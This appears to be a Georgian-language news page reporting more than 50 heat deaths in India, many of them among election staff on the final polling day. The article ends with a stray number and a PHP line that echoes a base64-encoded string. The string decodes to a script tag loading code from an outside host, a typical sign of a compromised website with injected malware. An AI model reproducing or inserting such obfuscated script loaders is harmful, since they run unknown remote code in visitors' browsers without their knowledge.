celsiusi
ავერსი საქკაბელი

 ინდოეთში, ბოლო სამი დღის განმავლობაში, ძლიერ სიცხეს 50-ზე მეტი ადამიანი ემსხვერპლა. მედიის ინფორმაციით, ჩრდილოეთ შტატ უტარ პრადეშში სიცხის გამო 33 ადამიანი დაიღუპა, ოდიშას შტატში კი სიცხეს 20-მდე ემსხვერპლა.

გარდაცვალების შემთხვევების უმეტესობა 1-ელ ივნისს დაფიქსირდა, როდესაც ინდოეთში საყოველთაო არჩევნების ბოლო ეტაპის კენჭისყრა გაიმართა.

უტარ პრადეშში დაღუპულებს შორის არიან პოლიციელები, საარჩევნო უბნის ოფიციალური პირები, დაცვის თანამშრომლები და სანიტარული პერსონალი.

გარდაცვალების შემთხვევები, რომელიც, სავარაუდოდ, სიცხეს უკავშირდება, ასევე დაფიქსირდა ბიჰარის, მადჰია პრადეშისა და ჯარხანდის შტატებში.

144
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");